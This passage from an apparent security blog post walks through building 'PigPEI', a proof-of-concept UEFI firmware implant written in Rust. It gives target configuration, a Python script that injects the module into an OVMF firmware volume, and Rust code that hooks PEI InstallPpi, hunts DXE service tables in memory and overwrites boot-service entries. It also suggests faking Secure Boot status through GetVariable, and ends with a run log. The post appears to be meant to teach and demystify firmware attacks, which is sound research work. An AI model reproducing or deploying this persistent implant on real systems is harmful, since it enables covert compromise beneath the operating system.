overhyping “APT” capabilities writing UEFI persistent malware. The main takeaway I want readers to get from this post is that UEFI is not magic; you can write UEFI malware in an afternoon. This article will not be covering how to bypass Secure Boot, Intel Boot Guard or whichever “le choix du jour” because bypasses for boot security technologies are pretty frequent and firmware is slow to update.

I have written a very simple PoC implant for OVMF called PigPEI. Pig can be used as a complete reference for listings in this article. If you are not interested in the sections about FFS or Rust toolchains then scroll until the PEI section.


Building a UEFI Module

A UEFI module will belong to a phase of the UEFI boot process: PEI, DXE (application), DXE (driver), bootloader. PEI is responsible for initialising the chipset environment for later UEFI stages (e.g. DRAM init). DXE applications will configure external hardware devices directly or via ACPI. In addition, DXE drivers will persist after boot to communicate with the operating system.

In our example, we will target PEI because most UEFI malware implants infect other DXE modules with a DXE module or by replacing DXE core (the module responsible for launching DXE modules) which is boring.

To build a PEIM, you can either use EDK2 or build a module from scratch. EDK2 is an open-source reference implementation of UEFI maintained by Tianocore. EDK2 can build a standalone module or a complete firmware image (e.g. OVMF) which bundles all necessary executables. However, we will build a module from scratch then inject the module into an existing firmware image.

Rust stuff

The implant will be implemented in Rust because it can. We will restrict ourselves to no runtime dependencies (including std) so everything must be written from scratch (build dependencies are fine).

The Rust toolchain must be configured to emit a PE32 image with the suitable properties:

We can accomplish this with a Cargo build profile:

    "llvm-target": "x86_64-unknown-windows",
    "arch": "x86_64",
    "os": "uefi",
    "cpu": "x86-64",

    "data-layout": "e-m:w-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128",
    "target-pointer-width": "64",
    "target-c-int-width": "32",
    "max-atomic-width": "64",
    "features": "-mmx,-sse,+soft-float",

    "is-like-windows": true,
    "executables": true,
    "exe-suffix": ".efi",

    "linker": "rust-lld",
    "linker-flavor": "lld-link",
    "linker-is-gnu": false,
    "lld-flavor": "link",

    "pre-link-args": {
        "lld-link": [
    "abi-return-struct-as-int": true,
    "static-position-independent-executables": true,
    "disable-redzone": true,
    "stack-probes": {
        "kind": "call"
    "emit-debug-gdb-scripts": false

and .cargo/config to remove Rust non-core std:

target = "x86_64-none-uefi.json"

build-std = ["core", "compiler_builtins"]
build-std-features = ["compiler-builtins-mem"]

and Cargo.toml section to keep the PEIM small:

panic = "abort"
strip = "symbols"
opt-level = "z"

With these configurations, we can build a suitable PE32 image with the right properties using the standard Rust toolchain.


The UEFI Platform Initialisation specification describes all data types and operating behaviour for PEI. In addition, the UEFI specification describes all data types and operating behaviour for DXE (and beyond). We must implement all necessary data types and conform to all involved interfaces.

Important types include:

The PEIM EFI_PEIM_ENTR_POINT2 is invoked by the PEI dispatcher at boot:


  IN EFI_PEI_FILE_HANDLE        FileHandle


FileHandle: Handle of the file being invoked.

PeiServices: Describes the list of possible PEI Services.

The EFI_PEI_SERVICES defines a set of services usable by PEIMs (analogous to EFI_RUNTIME_SERVICES and EFI_BOOT_SERVICES). We have to define the struct so we can use the function pointers passed to the entrypoint.

pub struct PeiServices {
    header: TableHeader,

    // PPI Functions
    pub install_ppi: pei_fn!(*const PpiDescriptor),
    reinstall_ppi: Cptr,
    locate_ppi: Cptr,
    notify_ppi: Cptr,

    // Boot Mode Functions
    pub get_boot_mode: pei_fn!(&mut BootMode),
    set_boot_mode: Cptr,

Now we can invoke PEI services. For example, we can get the EFI_BOOT_MODE of the current invocation with the following.

fn get_boot_mode(svc: &&mut PeiServices) -> BootMode {
    let mut boot_mode = BootMode::FullConfig;
    if (svc.get_boot_mode)(svc, &mut boot_mode) != EfiStatus::Success {
        panic!("call to GetBootMode() failed")

The last bit of scaffolding is to get debug output. I chose to implement an identical interface to the log crate, wrapping UART, but you can use whatever.

Firmware File System injection

Now that we have a basic PEIM, we want to inject the PEIM into an existing firmware image. UEFI Firmware Volumes (FVs) are formatted with Firmware File System (FFS).

2.2.2 Firmware File System Format

The PI Architecture Firmware File System is a binary layout of file storage within firmware volumes. It is a flat file system in that there is no provision for any directory hierarchy; all files reside in the root directly. Files are stored end to end without any directory entry to describe which files are present. Parsing the contents of a firmware volume to obtain a listing of files present requires walking the firmware volume from beginning to end.

FFS files are comprised of a file header and sections. The file header describes the type, size, and other properties then the sections contain the data relevant for the parent file type. The sections are laid out contiguously after the file header (the sections have trailing data). Any remaining space in the file must be padded. For example, a PEIM will be stored as:

The layout of EFI_FFS_FILE_HEADER is listed below (IntegrityCheck is a 16-bit checksum).


/* FFS File Type */
#define EFI_FV_FILETYPE_RAW         0x01
#define EFI_FV_FILETYPE_PEIM        0x06
#define EFI_FV_FILETYPE_FFS_PAD     0xf0

/* FFS File Attributes */
#define FFS_ATTRIB_LARGE_FILE       0x01

/* FFS File State Bits */
#define EFI_FILE_HEADER_VALID       0x02
#define EFI_FILE_DATA_VALID         0x04
typedef struct {
    EFI_GUID                Name;
    EFI_FV_FILETYPE         Type;
    UINT8                   Size[3];
    EFI_FFS_FILE_STATE      State;

/* EFI_FFS_FILE_HEADER2 has an extended Size for large files. */

The layout of EFI_COMMON_SECTION_HEADER is listed below.


/* Encapsulation section Type values */
/* Leaf section Type values */
#define EFI_SECTION_PE32            0x10
#define EFI_SECTION_VERSION         0x12
#define EFI_SECTION_PEI_DEPEX       0x1b
typedef struct {
    UINT8               Size[3];

Depending on the Type of the section, an additional header will follow the common header (e.g. EFI_COMPRESSION_SECTION which specifies the compression algorithm).

UEFITool GUID defined section

In this screenshot, we see a GUID defined section using LZMA to compress two subvolumes (containing DXE and PEI modules, respectively).

Matryoshka Sections

Despite FFS being a flat file system, sections can be of type EFI_SECTION_FIRMWARE_VOLUME_IMAGE which is a complete FV (i.e. FFS image). Therefore sections can embed multiple files after unpacking. In OVMF we can see the PEIMs are contained within a FV within a compressed section within a top-level file.

UEFITOol parsing FVs for OVMF

Adding A New File

To include our own PEIM, we must locate the existing PEIMs then append a valid FFS file to the parent FV. The FFS file must contain sections for:

You will have to build the sections yourself but here is a peek at mine :)

# encapsulate PE32 image
# the section size must be aligned for unknown reasons
pe_size = calcsize(FileSectionFmt) + len(module)
payload += make_section(EFI_SECTION_PE32, align8(pe_size))
payload += module
payload += make_padding(pe_size)
pe_size = align8(pe_size)
payload = bytearray(pack(FileHeaderFmt,
    (file_size >> 0 ) & 0xff,
    (file_size >> 8 ) & 0xff,
    (file_size >> 16) & 0xff,
) + payload)

# patch in integrity check for new file
header_checksum = make_checksum(payload[:calcsize(FileHeaderFmt)])
# ignore header checksum with magic value
data_checksum = 0xaa
checksum = pack("<BB", header_checksum, data_checksum)
payload[16:18] = checksum

# patch in file state (must be 0 while computing header checksum)
# the leading reserved bits must be set to the FV erase polarity

# the bits are flipped depending on erase polarity
if erase_polarity:
    state = ~state & 0xff

payload[23] = pack("B", state & 0xff)[0]
with open("payload.ffs", "wb") as f:

After appending the file to the FV, all parent sections and FVs must be updated to include the size of our file (this is recursive). An additional constraint is that we must ensure the file alignment is preserved after inserting a new file so other FVs may need modifying to include padding files. To do this, you can either write a script to parse FFS yourself or use UEFITool. If you choose to write your own script, section 2.2 of the PI spec describes routines for modifying files then verifying FV images. Otherwise, UEFITool can insert files interactively or update FVs programmatically using uefireplace.

$ uefireplace $FV/OVMF_CODE.fd $(cat uuid) 10 $TARGET 1>/dev/null

This replaces the file with the given UUID with the target file (containing an executable) which is detected by PEI core then dispatched.

Loading Images

The OVMF image can be directly loaded by QEMU for debugging.

#!/usr/bin/env sh
set -euo 1>/dev/null

cargo build
[ -f $TARGET ] || exit 1
uefireplace $FV/OVMF_CODE.fd $(cat uuid) 10 $TARGET 1>/dev/null

# Create a UEFI environment with mounted OVMF firmware and
# ISA exit device mapped at 0x501 I/O address.
qemu-system-x86_64 \
    -s -nographic \
    -machine type=q35,accel=kvm:tcg -m 512 \
    -drive file=$FV/OVMF_CODE.fd.patched,format=raw,if=pflash \
    -drive file=$FV/OVMF_VARS.fd,format=raw,if=pflash \
    -device isa-debug-exit \
    -debugcon file:debug.log -global isa-debugcon.iobase=0x402 \
    -monitor none -serial stdio

We have enabled the GDB server, serial output, and disabled graphics in a handy debug script.

Abusing Pre-EFI Initialisation (PEI)

Now that we have a working setup, we can start breaking UEFI. In UEFI, DXE core is responsible for launching DXE modules so we want to control DXE core to manipulate the DXE environment and the operating system. Obviously we can outright replace DXE core but reimplementing DXE core from scratch is tedious and modifying EDK2 is cheating.

Intercepting DXE core

We can control DXE core by hooking a PEI service which it invokes. We will hook the EFI_PEI_INSTALL_PPI service.



This service is the first one provided by the PEI Foundation. This function installs an interface in the PEI PPI database by GUID. The purpose of the service is to publish an interface that other parties can use to call additional PEIMs.


  IN CONST EFI_PEI_SERVICES           *PeiServices,


PeiServices: An indirect pointer to the EFI_PEI_SERVICES table published by the PEI Foundation.

PpiList: A pointer to the list of interfaces that the caller shall install.

We can intercept the DXE IPL PPI attempting to install EFI_PEI_END_OF_PEI_PHASE, a PPI used to indicate the end of the PEI phase. It is an optional PPI so an alternative mechanism is to hook EFI_DXE_IPL_PPI to control the discovery of the DXE Foundation.

pub unsafe fn hook_dxe_core(svc: &mut PeiServices) -> Result<(), EfiStatus> {
    // DxeCore signals the end of PEI by installing the EFI_DXE_IPL_PPI PPI.
    // By hooking InstallPpi, we can locate DxeCore by waiting for this PPI.
    debug!("hooking InstallPpi in EFI_PEI_SERVICES");
    ORIGINAL_INSTALL_PPI = svc.install_ppi;
    svc.install_ppi = install_ppi_hook;

/// EFI_INSTALL_PPI hook is triggered as a callback after our PEIM exits.
extern "efiapi" fn install_ppi_hook(
    svc: PeiServicesPtr, mut ppi_list: *const PpiDescriptor) -> EfiStatus {
    // DxeCore loader installs EFI_PEI_END_OF_PEI_PPI to signal end of PEI.
    const PPI_DESCRIPTOR_TERMINATE_LIST: usize = 0x80000000;
    const PEI_END_OF_PEI_PPI: Guid = guid!("605ea650-c65c-42e1-ba8091a52ab618c6");

    // Iterate until we can find DxeCore or proxy to original function.
    unsafe { loop {
        let descriptor = &*ppi_list;
        if *descriptor.guid == PEI_END_OF_PEI_PPI {
            info!("trapped DxeLoadCore before DxeCore is called");
            if let Err(status) = find_and_hook_services(svc) {
                panic!("failed to hook EFI_BOOT_SERVICES: {:?}", status);
        // Use the original InstallPpi to properly install the PPI.
        let status = ORIGINAL_INSTALL_PPI(svc, ppi_list);
        if status != EfiStatus::Success {
            warn!("original InstallPpi returned {:?}", status);
            break status;
        // Advance to the next descriptor.
        ppi_list = ppi_list.add(1);
        // The final entry of the PpiList is marked.
        if descriptor.flags & PPI_DESCRIPTOR_TERMINATE_LIST != 0 {
            break EfiStatus::Success;

This hook scans the list of PPIs to be installed to find our target GUID. If the GUID is present then we have interrupted DXE core.

Hooking Service Tables

Once we have intercepted DXE IPL PPI, we can locate the service tables. The service tables can be easily found by scanning for the table signatures in memory. However, we can reduce the search space by (ab)using the HOB list. The HOB list is a Hand-Off Block list passed by the DXE Initial Program Load to the DXE Foundation. The HOB list describes the environment, informing the DXE Foundation on how to behave properly (e.g. preventing allocations in stolen memory).

The HOB List must contain the Phase Handoff Information Table (PHIT) HOB. The PHIT HOB describes a region of tested memory (i.e. stable and reliable memory) which the DXE Foundation can use to read the HOB List. The PHIT is laid out as follows.

typedef struct _EFI_HOB_HANDOFF_INFO_TABLE {
    UINT32                  Version;
    EFI_BOOT_MODE           BootMode;
    EFI_PHYSICAL_ADDRESS    EfiMemoryBottom;
    EFI_PHYSICAL_ADDRESS    EfiFreeMemoryTop;
    EFI_PHYSICAL_ADDRESS    EfiFreeMemoryBottom;

With the remaining HOBs directly following.

The HOB list will include an EFI_HOB_MEMORY_ALLOCATION HOB which describes all memory ranges outside the HOB list (i.e. memory which DXE Foundation can allocate). Therefore, if we can find the region of memory usable by the DXE Foundation then we can infer where the service tables reside.

unsafe fn find_dxe_core_hob(
    svc: &&mut PeiServices) -> EfiResult<*const MemoryAllocationModule> {
    // Retrieve the final HOB list for all PEIMs.
    let mut hob_list: *const HobGenericHeader = core::ptr::null();
    let status = (svc.get_hob_list)(svc, &mut hob_list);
    if status != EfiStatus::Success {
        error!("unable to call GetHobList service: {:?}", status);
        return Err(status);

    const EFI_HOB_MEMORY_ALLOCATION_HOB: u16 = 0x0002;
    const HOB_MEMORY_ALLOC_MODULE_GUID: Guid = guid!("f8e21975-0899-4f58-a4be5525a9c6d77a");
    // MkePkg DxeCore GUID
    const DXE_CORE_GUID: Guid = guid!("d6a2cb7f-6a18-4e2f-b43b9920a733700a");

    // Iterate over the HOBs until we find the corresponding DxeCore HOB.
    debug!("searching for {} HOB", DXE_CORE_GUID);

    // The first HOB is the PHIT which contains the PA of the last HOB.
    let phit = hob_list.cast::<HobHandoffInfoTable>().as_ref().unwrap();
    hob_list = hob_list.byte_add(phit.header.hob_length.into());

    // Iterate over the remaining HOBs until we find our target (or list ends).
    while hob_list != phit.end_of_hob_list {
        if (*hob_list).hob_type == EFI_HOB_MEMORY_ALLOCATION_HOB {
            let alloc_hob = hob_list.cast::<MemoryAllocationModule>();
            // The allocation HOBs are distinguished by a GUID in a header.
            if (*alloc_hob).alloc_header.name == HOB_MEMORY_ALLOC_MODULE_GUID {
                if (*alloc_hob).module_name == DXE_CORE_GUID {
                    info!("found DxeCore HOB at {:p}", hob_list);
                    return Ok(alloc_hob);
        // Advance to next HOB in the list.
        hob_list = hob_list.byte_add((*hob_list).hob_length.into());

We are cheating in this case since we are looking for memory allocation HOB belonging to the MdePkg DxeCore but a generic implant can scan all regions or intelligently figure out the GUID of the suspended DXE Foundation. Once we have the memory region containing the service tables, we can scan for the table signatures.

unsafe fn find_and_hook_services(svc: PeiServicesPtr) -> EfiResult<()> {
    // DxeCore is mapped into the same address space so we can scan the HOBs
    // directly to find the boot, runtime, and system tables.

    // The DXE core has an associated EFI_HOB_MEMORY_ALLOCATION_MODULE HOB
    // which describes the loaded PE32's memory range.
    let hob = &*find_dxe_core_hob(svc)?;
    let lo = hob.alloc_header.memory_base_address as *const u64;
    let hi = lo.byte_add(hob.alloc_header.memory_length as usize);

    // Attempt to locate the tables within the HOB range.
    let (st, bs, rt) = find_services(lo, hi)?;

    debug!("verifying table contents are as expected");
    // gRT is initially filled out with placeholder functions.
    debug!("gRT->GetTime       = {:p}", rt.get_time);
    debug!("gRT->SetTime       = {:p}", rt.set_time);
    debug!("gRT->SetWakeupTime = {:p}", rt.set_wakeup_time);
    assert!(rt.get_time == rt.set_wakeup_time && rt.get_time != rt.set_time);
    info!("table contents have been successfully validated");

    // Install the malicious hooks into the tables.
    hooks::install_dxe_hooks(st, bs, rt)

unsafe fn find_services(lo: *const u64, hi: *const u64)
        -> EfiResult<(&'static mut SystemTable,
                      &'static mut BootServices,
                      &'static mut RuntimeServices)> {
    // The service tables include a signature which we can search for.
    // The signatures will be aligned because of struct allocation.
    const EFI_BOOT_SERVICES_SIGNATURE: u64 = 0x56524553544f4f42;
    const EFI_RUNTIME_SERVICES_SIGNATURE: u64 = 0x56524553544e5552;
    const EFI_SYSTEM_TABLE_SIGNATURE: u64 = 0x5453595320494249;

    // Scan the HOB for the table signatures.
    debug!("scanning address range {:p}-{:p}", lo, hi);

    // EFI_SYSTEM_TABLE has its signature lying around for whatever reason
    // so we have to validate the matching object.
    let st = locate_table(lo, hi, EFI_SYSTEM_TABLE_SIGNATURE)?
    let system_table = if st.runtime_services as u64 > 0xffffffff  {
        let above_st = (st as *const _ as *const u64).add(1);
        locate_table(above_st, hi, EFI_SYSTEM_TABLE_SIGNATURE)?
    } else {
    info!("found EFI_SYSTEM_TABLE at {:p}", system_table);

    let boot_services = locate_table(lo, hi, EFI_BOOT_SERVICES_SIGNATURE)?
    info!("found EFI_BOOT_SERVICES at {:p}", boot_services);

    let runtime_services = locate_table(lo, hi, EFI_RUNTIME_SERVICES_SIGNATURE)?
    info!("found EFI_RUNTIME_SERVICES at {:p}", runtime_services);

    Ok((system_table, boot_services, runtime_services))

pub unsafe fn locate_table(mut addr: *const u64, hi: *const u64, sig: u64)
        -> EfiResult<*const u64> {
    while addr < hi {
        if *addr == sig {
            return Ok(addr)
        addr = addr.add(1);

We have hooked the service tables used by DxeMain. However, there is a problem, DxeMain copies these tables into a runtime memory pool which are later overwritten by DXE modules so any hooks in the PHIT tables will be ignored or overwritten.

However, there is a final hurdle. These are not the tables used by DXE modules invoked by DxeMain because DxeMain copies these tables into a runtime memory pool which are overwritten by DXE modules. This pool is not described by the PHIT so we have to hunt for the tables in memory after they have been copied to the runtime pool. We could modify these tables before they are copied but because the tables are overwritten, our hooks would be removed.

Manipulating DXE Modules

We need to trap into the DXE Foundation after the tables have been copied but before a DXE module is dispatched. We can do this by carefully crafting hooks into the original tables which are used by the DXE Foundation as it initialises the DXE environment. Our steps for interception will be:

  1. hook RegisterProtocolNotify to detect DXE Foundation reading FVs
  3. overwrite tables with our hooks
  4. profit

Hooking RegisterProtocolNotify

UEFI protocols are not always available so if a function needs a particular protocol to execute, it can register a callback to trigger when the protocol becomes available (e.g., wait for a device to become available). The function used by functions to wait for protocols is RegisterProtocolNotify.



Creates an event that is to be signaled whenever an interface is installed for a specific protocol.


    IN EFI_GUID     *Protocol,
    IN EFI_EVENT    Event,
    OUT VOID        **Registration

MdePkg DxeCore calls RegisterProtocolNotify to determine when it can read the FV so it can dispatch DXE modules. By cheating, we know that MdePkg DxeCore will install the firmware volume protocol afer the runtime services and system table have been allocated in runtime pools.

extern "efiapi" fn reg_proto_notify_hook(
        guid: *const Guid, event: Cptr, reg: Cptr) -> EfiStatus {
        = guid!("220e73b6-6bdb-4413-8405b974b108619a");

    if unsafe { *guid == FIRMWARE_VOLUME_2_PROTOCOL_GUID && FIRST_ATTEMPT } {
        info!("intercepted DxeMain after initialisation");
        // We have intercepted DxeMain before other DXE modules but after
        // the service tables have been relocated. We can hunt then hook.
        if locate_and_hook_tables() != EfiStatus::Success {
            error!("cannot install hooks, failing silently");
        // Ensure that we do not hook the service tables twice.
        unsafe { FIRST_ATTEMPT = false };
    unsafe { ORIG_REG_PROTO_NOTIFY(guid, event, reg) }

Now we have interrupted DXE Foundation after the tables have been relocated and before any other DXE Modules are launched. We can start looking for the tables.

Hunting for Tables

EDK-2 maintains a pool of available pages which are allocated on demand. We can search for these pages by walking the page-table. We use some criteria to reduce false-positives and speed up the search by only considering present pages and ignoring all pages above 4GB. Once we have found table signatures, we try to validate the contents.

A final check validates that the tables are properly linked by checking that the system table has a pointer to the runtime services table. If the candidates pass these checks then we have found our tables which we can hook.

Final Hooks

The hooks are straightforward to implement by overwriting table entries. The reference implementation hooks ExitBootServices but a more interesting target is GetVariable so we can lie about the presence of Secure Boot.

fn locate_and_hook_tables() -> EfiStatus {
    if let Some((st, rt)) = unsafe { hunt_for_tables() } {
        info!("found referential pair of UEFI tables, all tables found");
        debug!("gST                  = {:p}", st);
        debug!("gST->RuntimeServices = {:p}", st.runtime_services);
        debug!("gST->BootServices    = {:p}", st.boot_services);
        unsafe {
            let bs = st.boot_services.as_mut().unwrap();
            info!("installing gBS->ExitBootServices hook");
            ORIG_EXIT_BOOT_SERVICES = bs.exit_boot_services;
            bs.exit_boot_services = exit_boot_services_hook;
            BS.write(bs); // permanent, this will not be relocated.
            RT.write(rt); // permanent, this will not be relocated.
            ST.write(st); // permanent, this will not be relocated.
    } else {

extern "efiapi" fn exit_boot_services_hook(img: Cptr, key: usize) -> EfiStatus {
    info!("DXE image has initiated ExitBootServices()");
    unsafe { ORIG_EXIT_BOOT_SERVICES(img, key) }

With the hooks, you can control DXE and the OS as you please.


We pwn3d UEFI!!!111!

[OK] loaded PigPEI
[??] hooking InstallPpi in EFI_PEI_SERVICES
[OK] trapped DxeLoadCore before DxeCore is called
[??] searching for d6a2cb7f-6a18-4e2f-b43b-9920a733700a HOB
[OK] found DxeCore HOB at 0x1bf58d48
[??] scanning address range 0x1fe89000-0x1feb7000
[OK] found EFI_SYSTEM_TABLE at 0x1feaee00
[OK] found EFI_BOOT_SERVICES at 0x1feae820
[OK] found EFI_RUNTIME_SERVICES at 0x1feadd80
[??] verifying table contents are as expected
[??] gRT->GetTime       = 0x1fe98c72
[??] gRT->SetTime       = 0x1fe98c67
[??] gRT->SetWakeupTime = 0x1fe98c72
[OK] table contents have been successfully validated
[OK] hooking gBS->RegisterProtocolNotify
[OK] intercepted DxeMain after initialisation
[??] searching pages for table signatures
[??] cr3 = 1fc01000
[??] PML4 = 0x1fc01000
[OK] found EFI_SYSTEM_TABLE at 0x1f9ee018
[OK] found EFI_RUNTIME_SERVICES at 0x1f9eeb98
[OK] found referential pair of UEFI tables, all tables found
[??] gST                  = 0x1f9ee018
[??] gST->RuntimeServices = 0x1f9eeb98
[??] gST->BootServices    = 0x1feae820
[OK] installing gBS->ExitBootServices hook
[OK] removing gBS->RegisterProtocolNotify hook
